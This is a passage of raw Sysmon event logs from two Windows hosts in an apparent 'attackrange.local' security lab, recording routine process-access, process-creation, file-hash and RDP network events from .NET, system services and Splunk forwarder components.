4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.122{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC30-607E-450F-00000000BB01}6972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.106{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC30-607E-450F-00000000BB01}6972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.106{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC30-607E-450F-00000000BB01}6972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.059{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC30-607E-440F-00000000BB01}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.059{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC30-607E-440F-00000000BB01}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.059{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC30-607E-440F-00000000BB01}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050666Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.987{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EC30-607E-F306-00000000BB01}1884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050665Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.987{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050664Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.987{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050663Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.987{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050662Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.987{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050661Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.987{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050660Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.987{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050659Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.987{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050658Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.987{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050657Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.987{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050656Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.987{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EC30-607E-F306-00000000BB01}1884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050655Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.987{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EC30-607E-F306-00000000BB01}1884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050654Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.987{85C0FFC9-EC30-607E-F306-00000000BB01}1884C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000050653Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.908{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DC68D681827EDC0A9FF0E161381E1372,SHA256=BDDB599521E7E73CA78AEE826368D4DE73942E5C230134F21A15577333C97BBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050652Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.658{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EE8AEF8D6CABFD1265A06AB10FF9B5B,SHA256=AB59FB256EC38DB7908A9F61324FC4F99408102F22D34887074FF57FBFD489A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050651Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:53.845{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58460-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000050650Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.033{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EC30-607E-F206-00000000BB01}1972C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050649Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.033{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050648Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.033{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050647Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:56.033{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050646Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 